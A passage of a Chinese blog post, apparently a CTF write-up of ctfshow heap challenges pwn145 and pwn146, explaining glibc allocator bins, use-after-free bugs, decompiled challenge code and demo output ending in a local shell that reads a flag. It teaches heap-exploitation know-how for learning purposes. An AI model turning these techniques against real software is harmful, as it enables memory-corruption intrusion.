{"id":737,"date":"2025-12-02T16:51:54","date_gmt":"2025-12-02T08:51:54","guid":{"rendered":"http:\/\/lycoreco.cn\/?p=737"},"modified":"2025-12-02T16:51:56","modified_gmt":"2025-12-02T08:51:56","slug":"ctfshow%e5%a0%86%e5%89%8d%e7%bd%aepwn145pwn149","status":"publish","type":"post","link":"http:\/\/lycoreco.cn\/index.php\/2025\/12\/02\/ctfshow%e5%a0%86%e5%89%8d%e7%bd%aepwn145pwn149\/","title":{"rendered":"ctfshow:\u5806\u524d\u7f6epwn145~pwn149"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\" id=\"xGhPA\">1\u3001pwn145<\/h2>\n\n\n\n<p id=\"ue9022f62\"><s>\u6ca1\u94b1\u4e86\u5b69\u5b50\u4eec\uff0c\u53ea\u80fd\u672c\u5730\u73a9\u73a9\u4e86<\/s><\/p>\n\n\n\n<p id=\"ub727bb72\">\u7ee7\u7eed\u5b66\u4e60\u5806\uff0c\u8fd9\u9053\u9898\u7684\u63d0\u793a\u662f\uff1aglibc\u7684\u4e00\u79cd\u5206\u914d\u89c4\u5219<\/p>\n\n\n\n<p id=\"u76fb4cb0\">\u9996\u5148\u67e5\u67e5glibc\u5206\u914d\u89c4\u5219\u662f\u4ec0\u4e48\uff1a<\/p>\n\n\n\n<div class=\"wp-block-group is-vertical is-layout-flex wp-container-core-group-is-layout-8cf370e7 wp-block-group-is-layout-flex\">\n<h5 class=\"wp-block-heading\" id=\"qMPGE\">glibc \u5806\u5185\u5b58\u6574\u4f53\u67b6\u6784<\/h5>\n\n\n\n<p id=\"u106aa794\"><mark style=\"background-color:#8ed1fc\" class=\"has-inline-color\">glibc \u4f7f\u7528 ptmalloc2 \u7ba1\u7406\u5806\uff0c\u57fa\u4e8e bins + tcache\uff082.26+\uff09<\/mark><\/p>\n\n\n\n<p id=\"u1ce435ab\"><mark style=\"background-color:#8ed1fc\" class=\"has-inline-color\">\u4e3b\u8981\u7ed3\u6784\uff1a<\/mark><\/p>\n\n\n\n<p id=\"ud9745744\"><mark style=\"background-color:#8ed1fc\" class=\"has-inline-color\">malloc \u2192 \u4ece tcache \u62ff \u2192 fastbin \u2192 smallbin \u2192 unsortedbin \u2192 largebin \u2192 top chunk<\/mark><\/p>\n\n\n\n<p id=\"u28b121b2\"><mark style=\"background-color:#8ed1fc\" class=\"has-inline-color\">free \u2192 \u5148 tcache \u2192 fastbin \u2192 unsortedbin \u2192 smallbin\/largebin<\/mark><\/p>\n<\/div>\n\n\n\n<div class=\"wp-block-group is-vertical is-layout-flex wp-container-core-group-is-layout-8cf370e7 wp-block-group-is-layout-flex\">\n<h5 class=\"wp-block-heading\" id=\"tl0NH\">\u5404\u79cd Bin \u7684\u4f5c\u7528\u4e0e\u7279\u70b9<\/h5>\n\n\n\n<h6 class=\"wp-block-heading\" id=\"YcbTl\">tcache\uff082.26+ \u65b0\u7279\u6027\uff09<\/h6>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u6bcf\u4e2a\u7ebf\u7a0b\u6709\u4e00\u7ec4 tcache bins<\/li>\n\n\n\n<li>\u6bcf\u4e2a bin \u6700\u591a\u5b58 7 \u4e2a chunk<\/li>\n\n\n\n<li>\u94fe\u8868\u4e3a <strong>\u5355\u94fe\u8868<\/strong><\/li>\n\n\n\n<li>free \u65f6\u4f18\u5148\u653e\u5165 tcache<\/li>\n\n\n\n<li>malloc \u65f6\u4f18\u5148\u4ece tcache \u62ff<\/li>\n<\/ul>\n\n\n\n<p>\u7528\u9014\uff1a\u52a0\u901f\u9891\u7e41\u7684\u5c0f\u5757\u5206\u914d<br>\u5b89\u5168\u6027\uff1a\u6bd4 fastbin \u66f4\u5f31\uff0c\u662f\u5f88\u591a\u653b\u51fb\uff08tcache poisoning\uff09\u7684\u91cd\u70b9\u3002<\/p>\n<\/div>\n\n\n\n<div class=\"wp-block-group is-vertical is-layout-flex wp-container-core-group-is-layout-8cf370e7 wp-block-group-is-layout-flex\">\n<h6 class=\"wp-block-heading\" id=\"TywWq\">fastbin<\/h6>\n\n\n\n<ul class=\"wp-block-list\">\n<li>chunk size \u8303\u56f4\uff1a<strong>0x20 ~ 0x70\uff08\u4e0d\u540c\u7248\u672c\u7565\u4e0d\u540c\uff09<\/strong><\/li>\n\n\n\n<li>\u5355\u94fe\u8868<\/li>\n\n\n\n<li>FREE \u65f6\u4e0d\u5408\u5e76\uff08no consolidation\uff09<\/li>\n\n\n\n<li>MALLOC \u65f6\u4ece\u5bf9\u5e94\u7684 fastbin \u94fe\u8868\u53d6\u7b2c\u4e00\u4e2a<\/li>\n<\/ul>\n\n\n\n<p id=\"u1fdba18b\">\u4e3b\u8981\u6f0f\u6d1e\u5229\u7528\u70b9\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>double free<\/strong><\/li>\n\n\n\n<li>fastbin dup \u2192 \u4efb\u610f\u5199<\/li>\n<\/ul>\n<\/div>\n\n\n\n<h6 class=\"wp-block-heading\" id=\"b1gR3\">unsorted bin<\/h6>\n\n\n\n<ul class=\"wp-block-list\">\n<li>free \u7684\u5927\u591a\u6570 chunk \u6700\u5f00\u59cb\u90fd\u4f1a\u8fdb\u5165 unsorted bin<\/li>\n\n\n\n<li>\u4e00\u4e2a\u53cc\u5411\u94fe\u8868<\/li>\n\n\n\n<li>\u5728\u4e0b\u4e00\u6b21 malloc \u65f6\u4f1a\u5206\u5272<\/li>\n\n\n\n<li>\u7ecf\u5e38\u7528\u4e8e <strong>leak libc \u5730\u5740<\/strong>\uff08\u56e0\u4e3a\u91cc\u9762\u7684 bk \/ fd \u5e26\u7740 libc \u94fe\u8868\u6307\u9488\uff09<\/li>\n<\/ul>\n\n\n\n<p id=\"u2ccfdbd9\"><strong>smallbin<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>chunk size\uff1a\u56fa\u5b9a\u5927\u5c0f\uff080x20 ~ 0x400 \u4e00\u4e9b\u533a\u95f4\uff09<\/li>\n\n\n\n<li>\u53cc\u5411\u5faa\u73af\u94fe\u8868<\/li>\n\n\n\n<li>free \u65f6\u653e\u5165 smallbin<\/li>\n\n\n\n<li>malloc \u65f6\u5fc5\u987b EXACT SIZE \u5339\u914d<\/li>\n<\/ul>\n\n\n\n<h6 class=\"wp-block-heading\" id=\"cbAcD\">largebin<\/h6>\n\n\n\n<ul class=\"wp-block-list\">\n<li>chunk \u6bd4 smallbin \u5927<\/li>\n\n\n\n<li>\u6309\u5927\u5c0f\u6392\u5e8f<\/li>\n\n\n\n<li>malloc \u65f6\u4f1a\u5728 bin \u4e2d\u627e\u201c\u6700\u5408\u9002\u5757\u201d\uff08best fit\uff09<\/li>\n<\/ul>\n\n\n\n<p id=\"u69b58540\">\u8fd9\u90e8\u5206\u4e00\u822c\u7528\u4e8e\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>unlink attack<\/strong><\/li>\n\n\n\n<li><strong>largebin attack<\/strong><\/li>\n<\/ul>\n\n\n\n<div class=\"wp-block-group is-vertical is-layout-flex wp-container-core-group-is-layout-8cf370e7 wp-block-group-is-layout-flex\">\n<h5 class=\"wp-block-heading\" id=\"CQTDm\">glibc malloc \u7684\u6838\u5fc3\u6d41\u7a0b \uff1a<\/h5>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"66e8392f\"><strong>MALLOC(size)<\/strong> \u7b80\u5316\u6d41\u7a0b\uff1a<\/h5>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>tcache \u6709\uff1f\u76f4\u63a5\u53d6<\/strong><\/li>\n\n\n\n<li>fastbin \u6709\uff1f\u53d6<\/li>\n\n\n\n<li>unsorted bin \u627e\u53ef\u7528 chunk<\/li>\n\n\n\n<li>smallbin \/ largebin \u67e5\u627e<\/li>\n\n\n\n<li>\u4e0d\u591f\u5219\u4ece <strong>top chunk \u5207\u5272<\/strong><\/li>\n\n\n\n<li>top chunk \u4e0d\u591f \u2192 \u89e6\u53d1 <strong>brk \u6216 mmap<\/strong><\/li>\n<\/ol>\n<\/div>\n\n\n\n<div class=\"wp-block-group is-vertical is-layout-flex wp-container-core-group-is-layout-8cf370e7 wp-block-group-is-layout-flex\">\n<h5 class=\"wp-block-heading\" id=\"SrBCY\">glibc free \u6d41\u7a0b \uff1a<\/h5>\n\n\n\n<h6 class=\"wp-block-heading\" id=\"ceVO3\">FREE(ptr) \u6d41\u7a0b\uff1a<\/h6>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u76ee\u6807 chunk \u5927\u5c0f \u2264 tcache\uff1f<br>\u2192 <strong>\u653e\u5165 tcache<\/strong><\/li>\n\n\n\n<li>fastbin \u5927\u5c0f\uff1f<br>\u2192 \u653e\u5165 fastbin<\/li>\n\n\n\n<li>\u5426\u5219\uff1a<br>\u2192 \u653e\u5165 unsorted bin<br>\u2192 \u53ef\u80fd\u548c\u524d\u540e chunk \u5408\u5e76\uff08consolidation\uff09<\/li>\n<\/ol>\n\n\n\n<p id=\"u9b5f53d5\">\u5408\u5e76\u884c\u4e3a\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>fastbin chunk <strong>\u4e0d\u5408\u5e76<\/strong><\/li>\n\n\n\n<li>small\/large \u4f1a\u5408\u5e76<\/li>\n\n\n\n<li>\u901a\u5e38\u653e\u5165 unsorted bin \u540e\u4f1a\u5408\u5e76\uff0c\u6216\u7b49\u5f85\u4e0b\u4e00\u6b21 malloc \u518d\u5904\u7406<\/li>\n<\/ul>\n<\/div>\n\n\n\n<p id=\"u85a339c8\">\u5927\u6982\u5c31\u8bb0\u5f55\u8fd9\u4e9b\uff0c\u7136\u540e\u5f00\u59cb\u5206\u6790\u8fd9\u4e2a\u7a0b\u5e8f<\/p>\n\n\n\n<p id=\"ue4b6c135\">checksec:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-13-1024x439.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"439\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-13-1024x439.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-738\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u26113119\">64\u4f4d\u5f00\u4e86canary\u548cNX,\u8fd0\u884c\u770b\u770b\u60c5\u51b5\uff08\u81ea\u5df1\u5728\u672c\u5730\u5199\u4e86flag\uff09<\/p>\n\n\n\n<p id=\"ua2bffd36\">\u662f\u4e00\u4e2a\u6f14\u793a\u8fc7\u7a0b\uff0c\u6f14\u793a\u5b8c\u8f93\u5165sh\u5c31\u53ef\u4ee5\u67e5\u770bflag<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>faetong@faetong-virtual-machine:~\/pwnit$ .\/pwn145\n    \u2584\u2584\u2584\u2584   \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584  \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584            \u2584\u2584                           \n  \u2588\u2588\u2580\u2580\u2580\u2580\u2588  \u2580\u2580\u2580\u2588\u2588\u2580\u2580\u2580  \u2588\u2588\u2580\u2580\u2580\u2580\u2580\u2580            \u2588\u2588                           \n \u2588\u2588\u2580          \u2588\u2588     \u2588\u2588        \u2584\u2584\u2588\u2588\u2588\u2588\u2588\u2584  \u2588\u2588\u2584\u2588\u2588\u2588\u2588\u2584   \u2584\u2588\u2588\u2588\u2588\u2584  \u2588\u2588      \u2588\u2588\n \u2588\u2588           \u2588\u2588     \u2588\u2588\u2588\u2588\u2588\u2588\u2588   \u2588\u2588\u2584\u2584\u2584\u2584 \u2580  \u2588\u2588\u2580   \u2588\u2588  \u2588\u2588\u2580  \u2580\u2588\u2588 \u2580\u2588  \u2588\u2588  \u2588\u2580\n \u2588\u2588\u2584          \u2588\u2588     \u2588\u2588         \u2580\u2580\u2580\u2580\u2588\u2588\u2584  \u2588\u2588    \u2588\u2588  \u2588\u2588    \u2588\u2588  \u2588\u2588\u2584\u2588\u2588\u2584\u2588\u2588 \n  \u2588\u2588\u2584\u2584\u2584\u2584\u2588     \u2588\u2588     \u2588\u2588        \u2588\u2584\u2584\u2584\u2584\u2584\u2588\u2588  \u2588\u2588    \u2588\u2588  \u2580\u2588\u2588\u2584\u2584\u2588\u2588\u2580  \u2580\u2588\u2588  \u2588\u2588\u2580 \n    \u2580\u2580\u2580\u2580      \u2580\u2580     \u2580\u2580         \u2580\u2580\u2580\u2580\u2580\u2580   \u2580\u2580    \u2580\u2580    \u2580\u2580\u2580\u2580     \u2580\u2580  \u2580\u2580  \n    * *************************************                           \n    * Classify: CTFshow --- PWN --- \u5165\u95e8                              \n    * Type  : Heap_Exploitation                                       \n    * Site  : https:\/\/ctf.show\/                                       \n    * Hint  : Why it can UAF(use after free) ?                        \n    * *************************************                           \n\u6f14\u793aglibc \u7684\u5206\u914d\u673a\u5236\nglibc \u4f7f\u7528\u9996\u6b21\u9002\u5e94\u7b97\u6cd5\u9009\u62e9\u7a7a\u95f2\u7684\u5806\u5757\n\u5982\u679c\u6709\u4e00\u4e2a\u7a7a\u95f2\u5806\u5757\u4e14\u8db3\u591f\u5927\uff0c\u90a3\u4e48 malloc \u5c06\u9009\u62e9\u5b83\n\u5982\u679c\u5b58\u5728 use-after-free \u7684\u60c5\u51b5\u90a3\u53ef\u4ee5\u5229\u7528\u8fd9\u4e00\u7279\u6027\n\u9996\u5148\u7533\u8bf7\u4e24\u4e2a\u6bd4\u8f83\u5927\u7684 chunk\n\u7b2c\u4e00\u4e2a a = malloc(0x512) \u5728: 0x2a80b2a0\n\u7b2c\u4e8c\u4e2a b = malloc(0x256) \u5728: 0x2a80b7c0\n\u6211\u4eec\u53ef\u4ee5\u7ee7\u7eed\u5206\u914d\u5b83\n\u73b0\u5728\u6211\u4eec\u628a \"AAAAAAAA\" \u8fd9\u4e2a\u5b57\u7b26\u4e32\u5199\u5230 a \u90a3\u91cc \n\u7b2c\u4e00\u6b21\u7533\u8bf7\u7684 0x2a80b2a0 \u6307\u5411 AAAAAAAA\n\u63a5\u4e0b\u6765 free \u6389\u7b2c\u4e00\u4e2a...\n\u63a5\u4e0b\u6765\u53ea\u8981\u6211\u4eec\u7533\u8bf7\u4e00\u5757\u5c0f\u4e8e 0x512 \u7684 chunk\uff0c\u90a3\u5c31\u4f1a\u5206\u914d\u5230\u539f\u672c a \u90a3\u91cc: 0x2a80b2a0\n\u7b2c\u4e09\u6b21 c = malloc(0x500) \u5728: 0x2a80b2a0\n\u6211\u4eec\u8fd9\u6b21\u5f80\u91cc\u5199\u4e00\u4e32 \"CCCCCCCC\" \u5230\u521a\u7533\u8bf7\u7684 c \u4e2d\n\u7b2c\u4e09\u6b21\u7533\u8bf7\u7684 c 0x2a80b2a0 \u6307\u5411 CCCCCCCC\n\u7b2c\u4e00\u6b21\u7533\u8bf7\u7684 a 0x2a80b2a0 \u6307\u5411 CCCCCCCC\n\u53ef\u4ee5\u770b\u5230\uff0c\u867d\u7136\u6211\u4eec\u521a\u521a\u770b\u7684\u662f a \u7684\uff0c\u4f46\u5b83\u7684\u5185\u5bb9\u5374\u662f \"CCCCCCCC\"\nsh\n$ ls\nflag  pwn145\n$ cat flag\nflag{Inoue_Takina}\n$ \n<\/code><\/pre>\n\n\n\n<p id=\"ufd74e90e\">\u6f14\u793a\u7684\u662f\u4e00\u79cdglibc\u5206\u914d\u89c4\u5219\uff0c\u7eaf\u6f14\u793a\uff0c\u76f4\u63a5\u4e0b\u4e00\u9053\u9898\u5427<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"IpYje\">2\u3001pwn146\uff08\u4e3a\u4ec0\u4e48\u4f1a\u4ea7\u751fUAF\u6f0f\u6d1e\uff1f\uff09<\/h2>\n\n\n\n<p id=\"u63c34e27\">\u9898\u76ee\u63d0\u793a\uff1a\u4e3a\u4ec0\u4e48\u4f1a\u4ea7\u751fUAF\u6f0f\u6d1e\uff1f<\/p>\n\n\n\n<div class=\"wp-block-group is-vertical is-layout-flex wp-container-core-group-is-layout-8cf370e7 wp-block-group-is-layout-flex\">\n<h6 class=\"wp-block-heading\" id=\"w2Y3D\">UAF\u6f0f\u6d1e\uff1a<\/h6>\n\n\n\n<p id=\"u8ad751fb\">\u82f1\u6587\u7684\u8bdd\u66f4\u597d\u7406\u89e3UAF\u662f\u4ec0\u4e48\u610f\u601d\uff1a Use-After-Free<\/p>\n\n\n\n<p id=\"ud130961b\">\u6982\u5ff5\uff1a\u7a0b\u5e8f \u5df2\u7ecf\u901a\u8fc7 free\/delete \u91ca\u653e\u4e86\u67d0\u5757\u5806\u5185\u5b58\uff0c\u4f46\u4e4b\u540e\u4ecd\u7136\u901a\u8fc7 \u60ac\u6302\u6307\u9488\uff08dangling pointer\uff09 \u5bf9\u8fd9\u5757\u5df2\u91ca\u653e\u7684\u5185\u5b58\u8fdb\u884c\u8bbf\u95ee\uff08\u8bfb\u3001\u5199\u6216\u6267\u884c\uff09\u3002<\/p>\n\n\n\n<p id=\"u6d11fed1\">\u5927\u767d\u8bdd\u8bb2\u5c31\u662f\uff1a \u5185\u5b58\u5df2\u7ecf\u88ab free \u6389\u4e86\uff0c\u7a0b\u5e8f\u5374\u8fd8\u7ee7\u7eed\u628a\u5b83\u5f53\u6b63\u5e38\u6570\u636e\u6765\u7528\u3002<\/p>\n\n\n\n<p id=\"u33102909\">\u4eba\u673a\u7ed9\u4e86\u4e00\u4e2a\u5e7d\u9ed8\u7684\uff1a \u5c31\u50cf\u4f60\u628a\u51fa\u79df\u5c4b\u9000\u79df\u4e86\uff0c\u4f46\u4f60\u8fd8\u5077\u5077\u62ff\u7740\u94a5\u5319\u8fdb\u53bb\u4f4f\u4e00\u6837\uff08\u5371\u9669\u5f97\u5f88\uff09\u3002<\/p>\n\n\n\n<h6 class=\"wp-block-heading\" id=\"POiEA\">\u901a\u5e38\u51fa\u73b0\u7684\u60c5\u51b5<\/h6>\n\n\n\n<p id=\"u5682593f\">free\u4e4b\u540e\u6ca1\u6709\u628a\u6307\u9488\u6e05\u7a7a<\/p>\n<\/div>\n\n\n\n<pre class=\"wp-block-code\"><code>char *p = malloc(0x20);\nfree(p);\nprintf(\"%s\\n\", p); \/\/ p \u8fd8\u5728\u7528\uff0c\u70b8\uff01\n\/\/\u8fd9\u91cc p \u6307\u5411\u7684\u5185\u5b58\u5df2\u7ecf\u88ab\u6807\u8bb0\u4e3a\u53ef\u91cd\u7528\uff0c\u4f46\u7a0b\u5e8f\u8fd8\u4ee5\u4e3a\u5b83\u6709\u6548\u3002<\/code><\/pre>\n\n\n\n<p><br>\u4e00\u4e2a\u5bf9\u8c61\u88ab\u591a\u51fa\u5f15\u7528<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Node* a = malloc(sizeof(Node));\nNode* b = a;\nfree(a);\nb->value = 123; \/\/ b \u8fd8\u5728\u5199\uff0c\u5176\u5b9e\u5bf9\u8c61\u5df2\u7ecf free<\/code><\/pre>\n\n\n\n<p id=\"u609679fe\">\u63a5\u4e0b\u6765\u770b\u770b\u8fd9\u4e2a\u9898\u5427<\/p>\n\n\n\n<p id=\"uf64168f8\">checksec:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-14-1024x438.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"438\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-14-1024x438.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-739\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u48bcc649\">\u5f00\u4e86canary\u548cnx<\/p>\n\n\n\n<p id=\"ud66cebcd\">\u8fd0\u884c\u4e00\u4e0b<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-15-1024x246.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"246\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-15-1024x246.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-740\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u7ed3\u5408\u53cd\u6c47\u7f16\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>void __cdecl demo()\n{\n  ptr *p1; \/\/ &#91;rsp+0h] &#91;rbp-20h]\n  ptr *p2; \/\/ &#91;rsp+8h] &#91;rbp-18h]\n  char c&#91;8]; \/\/ &#91;rsp+10h] &#91;rbp-10h] BYREF\n  unsigned __int64 v3; \/\/ &#91;rsp+18h] &#91;rbp-8h]\n\n  v3 = __readfsqword(0x28u);\n  printf(&amp;format_);\n  p1 = (ptr *)malloc(0x20u);\n  printf(aP1, p1);\n  p1&#91;1] = (ptr)Printf;\n  puts(&amp;s_);\n  p1&#91;1](\"Hello CTFshow\\n\\n\");\n  puts(aFree_0);\n  free(p1);\n  puts(&amp;s__0);\n  p1&#91;1](\"Hello CTFshow again\\n\");\n  puts(&amp;s__1);\n  p2 = (ptr *)malloc(0x20u);\n  printf(aP2, p2);\n  printf(aP1, p1);\n  puts(&amp;s__2);\n  puts(\"Then get the flag &amp;&amp; enjoy it !\\n\");\n  p2&#91;1] = (ptr)demoflag;\n  putchar(36);\n  __isoc99_scanf(\"%2s\", c);\n  p1&#91;1](c);\n}<\/code><\/pre>\n\n\n\n<p><br>\u5f00\u59cb\u662f\u5206\u914d\u4e86\u5806\u7a7a\u95f4->p1[1]=printf->\u8ba9p1[1]\u8f93\u51faHello CTFshow->\u91ca\u653ep1\u4f46\u5e76\u6ca1\u6709\u7f6e\u96f6\uff0c\u5176\u5b9e\u540e\u9762\u5e94\u8be5\u7f6e\u96f6\u4e4b\u540e\u4ecd\u7136\u53ef\u4ee5\u6253\u5370Hello CTFshow<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    \u2584\u2584\u2584\u2584   \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584  \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584            \u2584\u2584                           \n  \u2588\u2588\u2580\u2580\u2580\u2580\u2588  \u2580\u2580\u2580\u2588\u2588\u2580\u2580\u2580  \u2588\u2588\u2580\u2580\u2580\u2580\u2580\u2580            \u2588\u2588                           \n \u2588\u2588\u2580          \u2588\u2588     \u2588\u2588        \u2584\u2584\u2588\u2588\u2588\u2588\u2588\u2584  \u2588\u2588\u2584\u2588\u2588\u2588\u2588\u2584   \u2584\u2588\u2588\u2588\u2588\u2584  \u2588\u2588      \u2588\u2588\n \u2588\u2588           \u2588\u2588     \u2588\u2588\u2588\u2588\u2588\u2588\u2588   \u2588\u2588\u2584\u2584\u2584\u2584 \u2580  \u2588\u2588\u2580   \u2588\u2588  \u2588\u2588\u2580  \u2580\u2588\u2588 \u2580\u2588  \u2588\u2588  \u2588\u2580\n \u2588\u2588\u2584          \u2588\u2588     \u2588\u2588         \u2580\u2580\u2580\u2580\u2588\u2588\u2584  \u2588\u2588    \u2588\u2588  \u2588\u2588    \u2588\u2588  \u2588\u2588\u2584\u2588\u2588\u2584\u2588\u2588 \n  \u2588\u2588\u2584\u2584\u2584\u2584\u2588     \u2588\u2588     \u2588\u2588        \u2588\u2584\u2584\u2584\u2584\u2584\u2588\u2588  \u2588\u2588    \u2588\u2588  \u2580\u2588\u2588\u2584\u2584\u2588\u2588\u2580  \u2580\u2588\u2588  \u2588\u2588\u2580 \n    \u2580\u2580\u2580\u2580      \u2580\u2580     \u2580\u2580         \u2580\u2580\u2580\u2580\u2580\u2580   \u2580\u2580    \u2580\u2580    \u2580\u2580\u2580\u2580     \u2580\u2580  \u2580\u2580  \n    * *************************************                           \n    * Classify: CTFshow --- PWN --- \u5165\u95e8                              \n    * Type  : Heap_Exploitation                                       \n    * Site  : https:\/\/ctf.show\/                                       \n    * Hint  : Why it can UAF(use after free) ?                        \n    * *************************************                           \n\u7533\u8bf70x20\u5927\u5c0f\u7684\u5185\u5b58p1 \u7684\u5730\u5740: 0x13ba010\n\u628ap1&#91;1]\u8d4b\u503c\u4e3aPrintf\u51fd\u6570\uff0c\u7136\u540e\u6253\u5370\u51fa\"Hello CTFshow\"\nHello CTFshow\n\nfree \u6389 p1\n\u56e0\u4e3a\u5e76\u6ca1\u6709\u7f6e\u4e3anull\uff0c\u6240\u4ee5p1&#91;1]\u4ecd\u7136\u662fPrintf\u51fd\u6570\uff0c\u4ecd\u7136\u53ef\u4ee5\u8f93\u51fa\u6253\u5370\u4e86\"Hello CTFshow again\"\nHello CTFshow again\n\u63a5\u4e0b\u6765\u518d\u53bbmalloc\u4e00\u4e2ap2\uff0c\u4f1a\u628a\u91ca\u653e\u6389\u7684p1\u7ed9\u5206\u914d\u51fa\u6765\uff0c\u53ef\u4ee5\u770b\u5230\u4ed6\u4fe9\u662f\u540c\u4e00\u5730\u5740\u7684\np2 \u7684\u5730\u5740: 0x13ba010\np1 \u7684\u5730\u5740: 0x13ba010\n\u7136\u540e\u628ap2&#91;1]\u7ed9\u6539\u6210demoflag\u4e5f\u5c31\u662fsystem\u51fd\u6570\n\nThen get the flag &amp;&amp; enjoy it !<\/code><\/pre>\n\n\n\n<p><br>\u8c03\u8bd5\u770b\u770b\uff0c\u9996\u5148\u6267\u884c\u5230malloc<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-16-1024x324.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"324\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-16-1024x324.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-741\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-17-1024x818.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"818\" 